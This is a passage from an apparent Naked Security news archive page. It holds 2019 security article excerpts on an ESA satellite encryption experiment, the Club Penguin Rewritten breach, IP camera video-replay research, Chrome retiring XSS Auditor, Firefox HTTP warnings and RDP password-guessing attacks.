The idea being that the more people who are actively involved in developing, debugging and testing your code, the easier, faster and cheaper it is to find and fix bugs in it.

It’s an idea that’s central to the success, longevity and robustness of sprawling, noisy, open source projects like the Linux kernel. The development process for Linux, and the many other open source projects propping up our internet ecosystem, is entirely transparent, conducted before a potential audience of billions of eyeballs.


August 5,2019 »

Space agency uses Raspberry Pi to solve satellite encryption puzzle

By John E Dunn

How does the European Space Agency (ESA) communicate securely with satellites and space missions?

Surprisingly, until relatively recently it often didn’t – something which is still true for smaller, cheaper satellites such as CubeSats.

Now ESA hopes that an experiment consisting of a small module built around a tiny Raspberry Pi Zero board controlled from a laptop on the ground will close this hypothetical security issue at very low cost.

It’s called the Cryptography ICE Cube (or CryptIC), measures only 10x10x10cm, and is the brainchild of a special ESA department called the International Commercial Experiments service, or ICE Cubes for short.

Currently installed on the Cygnus NG-11, launched in April 2019, the CryptIC box is a small unit shielded from the high radiation levels in space using a plastic coating.

However, while the coating protects the electronics from the worst of the radiation, it isn’t enough to stop interference with the microprocessors used to make encryption possible. ESA software product assurance engineer, Emmanuel Lesser, explains:

In orbit the problem has been that space radiation effects can compromise the key within computer memory causing ‘bit-flips’.

This is enough to disrupt communication as keys used on the ground and in space no longer match up.

The traditional solution to this is to use radiation-hardened equipment, but this is expensive.


4 million Club Penguin Rewritten accounts exposed in breach

By John E Dunn

Last Friday, the hugely popular gaming site Club Penguin Rewritten (CPRewritten) suffered a data breach that exposed four million user accounts.

Having account data including email addresses, usernames, IP addresses and passwords hacked is bad enough in any event but this was made much worse by the fact it came on the back of a separate breach in January 2018 affecting 1.7 million accounts, made public more than a year later.

The cause of the latest breach? According to someone connected to CPRewritten who contacted news site Bleeping Computer this week, the hack happened after hackers accessed a hidden PHP database back door put there by a former site admin last year.

It’s a version of events that both the individual concerned, and a hacking group that’s claimed responsibility for the hack, both strenuously deny.

The New World Order group who claim credit for the breach say they compromised the site using a vulnerability in the Adminer database administration tool. Regarding the admin’s involvement, they tweeted this:

…he had nothing to do with it. CPR admins know who we are, we’re responsible for the database breaches of many other CPPSes.

July breach

CPRewritten launched in 2017 in order to continue the earlier Club Penguin (CP), which was shut by owners Disney in the same year.

A year later it was announced that Club Penguin, too, would be closing, a decision that was reversed a month later after extra funding was found.


Anime filter glitches, exposing face of one extremely smart vlogger

By Lisa Vaas

Full disclosure.

Before delving into the case of a Chinese vlogger whom the public was aghast to find out was older than her filters made her out to be, I should tell you that the photo on my bio for Naked Security isn’t real.*

This is how I look without filters.

Forgive the deception. It’s necessary for me to eat your species. I mean mate with. I mean, hey, look over there, is that a blimp?

As the BBC tells it, The vlogger in question calls herself “Your Highness Qiao Biluo”. The porcelain-skinned cutie-pie was quite popular before the porcelain cracked during an interview she was doing with another vlogger, the jaw-droppingly cute presumably-without-filters Qingzi, on the Chinese video-game live-streaming DouYu platform, which is similar to Twitch.

Qiao Biluo had nearly 130,000 followers on DouYu before a computer glitch removed the filter she was using to make herself look like an anime doll (and thus imminently worthy of cash donations).

You can see for yourself how Your Highness Qiao Biluo’s filters failed during the chat, since it was captured on YouTube. She’s the woman on the right.

According to the BBC, the live-streaming platform Lychee News reported that the filter failure happened on 25 July, during the joint live-stream.

According to Global News, up until the filter fail, the vlogger had covered her face with an anime sticker. The BBC has a picture of Qiao Biluo using a filter in previous videos to make herself look younger:

"China has more than 425 million live-streamers and the use of face filters is something that is common across the……

Resh (@thebooksatchel) August 01, 2019

Prior to the accidental reveal, fans had been sending in donations, even without seeing her face, but had also been begging Qiao Biluo to remove her filter so they could see the real McCoy.


Facebook is working on mind-reading

By Lisa Vaas

How does the prospect of Facebook learning how to read minds strike you?

Fellow social media-participating lab rats, you are likely already aware that Facebook has been crafted on the principles of Las Vegas-esque addiction, the idea being to exploit human psychology by giving us little hits of dopamine with those “Likes” in order to keep us coming back to the platform like slot machine addicts feeling favored by Lady Luck.

In 2017, ex-president of Facebook Sean Parker told us all about Facebook’s nonchalantly endeavoring to get us addicted, during that era’s spate of mea-culpa’ing.

This is all just to say that it might be reasonable to worry about Facebook playing around with our wetware. There might be reasons why somebody might not trust Facebook with direct access to their brain.

But one of Facebook’s technology research projects – the funding of artificial intelligence (AI) algorithms capable of turning brain activity into speech – may be altruistic.

It’s about creating a brain-computer interface (BCI) that allows people to type just by thinking, and Facebook has announced that it’s just achieved a first in the field: while previous decoding has been done offline, for the first time, a team at University of California San Francisco has managed to decode a small set of full, spoken words and phrases from brain activity, in real-time.

In an article published on Tuesday in Nature Communications, University of California San Francisco (UCSF) neurosurgeon Edward Chang and postdoctoral student David Moses published the results of a study demonstrating that brain activity recorded while people speak could be used to almost instantly decode what they were saying into text on a computer screen.

Chang also runs a leading brain mapping and speech neuroscience research team dedicated to developing new treatments for patients with neurological disorders. In short, he’s the logical choice for the BCI program, which Facebook announced at its F8 conference in 2017. The program’s goal is to build a non-invasive, wearable device that lets people type by simply imagining that they’re talking.


Researchers hack camera in fake video attack

By Danny Bradbury

Tampering with surveillance cameras is a common activity for Hollywood heroes and criminals alike. Now, researchers have shown how they can do it in real life.

Remember Speed, the 1994 movie where Keanu Reeves and Sandra Bullock had to keep a bus moving above a certain speed to stop Dennis Hopper blowing it up? Hopper’s character, Howard Payne, watches them with a hidden video camera. Any funny business, and he presses the button. To fool him, they persuade a local news crew to record the camera footage and then broadcast it in a loop, enabling everyone to escape while convincing Payne that they were still there.

Back then, cameras were analogue, but researchers at security company Forescout have demonstrated how to do the same thing with digital cameras over a network.

They conducted the project, which they described in a technical paper, to see how easy it would be to attack internet-connected smart building environments rather than save speeding buses. They set up a test network incorporating smart lighting, IP surveillance cameras, and an IoT device that connected energy consumption and space consumption sensors.

Technology may make things more functional, but it also makes them more hackable. Many IP cameras come with weak protocols such as Telnet and FTP enabled by default, they pointed out – even when their users don’t need them. This needlessly increases the attack surface of the devices. They also stream video using unencrypted real-time transport (RTP), along with the real-time streaming protocol (RTSP).

There are secure versions of RTP and RTSP, but Forescout’s report said that it rarely sees them used in real-world deployments. You could tunnel the RTSP stream through an encrypted protocol such as a Transport Layer Security (TLS) stream, but again, vendors typically don’t bother.

Forescout’s team verified that they could gain access to the network by compromising an existing device. Given the reliance on default login credentials, this is all too common. Hackers can then use a compromised device to attack other devices on the network.


July 18, 2019 »

Google Chrome is ditching its XSS detection tool

By Danny Bradbury

Google is removing a nine-year-old feature in its Chrome web browser, which spotted a common online attack. Don’t worry, though – another, hopefully better, protection measure is on the way.

Introduced in 2010, XSS Auditor is a built-in Chrome function designed to detect cross-site scripting (XSS) vulnerabilities. In an XSS attack, a malicious actor injects their own code onto a legitimate website. They might do that by adding malicious code to a legitimate URL, or by posting content to a site that stores and displays what they’ve posted (persistent XSS).

When someone looks at the code injected by the attacker it executes a command in their browser, which might do anything from stealing the victim’s cookies to trying to infect them with a virus.

Websites should prevent this kind attack by sanitizing user-submitted data, but many don’t.

XSS Auditor tries to detect XSS vulnerabilities while the browser is parsing HTML. It uses a blocklist to identify suspicious characters or HTML tags in request parameters, matching them with content to spot attackers injecting code into a page.

The beef that some developers have is that it doesn’t catch all XSS vulnerabilities in a site. XSS code that the feature doesn’t spot, called bypasses, are common online.

Google’s engineers had already adapted XSS Auditor to filter out troublesome XSS code rather than blocking access altogether, citing “undesirable consequences”, but this clearly wasn’t enough, and now they’re killing it off altogether.


Still not using HTTPS? Firefox is about to shame you

By Danny Bradbury

Two years after promising to report all HTTP-based web pages as insecure, Mozilla is about to deliver. Soon, whenever you visit one of the shrinking number of sites that doesn’t use a security certificate, the Firefox browser will warn you.

Firefox developer Johann Hofmann announced the news this week:

In desktop Firefox 70, we intend to show an icon in the “identity block” (the left hand side of the URL bar which is used to display security / privacy information) that marks all sites served over HTTP (as well as FTP and certificate errors) as insecure.

Firefox 70 will ship in October. The change is an attempt to crack down on sites that don’t secure their communications.

Insecure browsers use the hypertext transfer protocol (HTTP), which sends data in clear text. HTTPS sites are more secure because they use Transport Layer Security (TLS), which establishes an encrypted link between the browser and the Web server before any HTTP requests are sent.

Hofmann explained that this was part of a broader initiative to simplify the security user-interface in Firefox 70.

Firefox began showing the ‘insecure’ icon in January 2017 but limited it to HTTP pages that collected passwords with login forms. It said at the time that it would expand the initiative to cover all HTTP pages.


RDP exposed: the wolves already at your door

By Mark Stockley

For the last two months the infosec world has been waiting to see if and when criminals will successfully exploit CVE-2019-0708, the remote, wormable vulnerability in Microsoft’s RDP (Remote Desktop Protocol), better known as BlueKeep.

The expectation is that sooner or later a BlueKeep exploit will be used to power some self-replicating malware that spreads around the world (and through the networks it penetrates) in a flash, using vulnerable RDP servers.

In other words, everyone is expecting something spectacular, in the worst possible way.

But while companies race to ensure they’re patched, criminals around the world are already abusing RDP successfully every day, in a different, no less devastating but much less spectacular way.

Many of the millions of RDP servers connected to the internet are protected by no more than a username and password, and many of those passwords are bad enough to be guessed, with a little (sometimes very little) persistence.

Correctly guess a password on one of those millions of computers and you’re in to somebody’s network.

It isn’t a new technique, and it sounds almost too simple to work, yet it’s popular enough to support criminal markets selling both stolen RDP credentials and compromised computers. The technique is so successful that the criminals crippling city administrations, hospitals, utilities and enterprises with targeted ransomware attacks, and demanding five- or six-figure ransoms, seem to like nothing more.


« older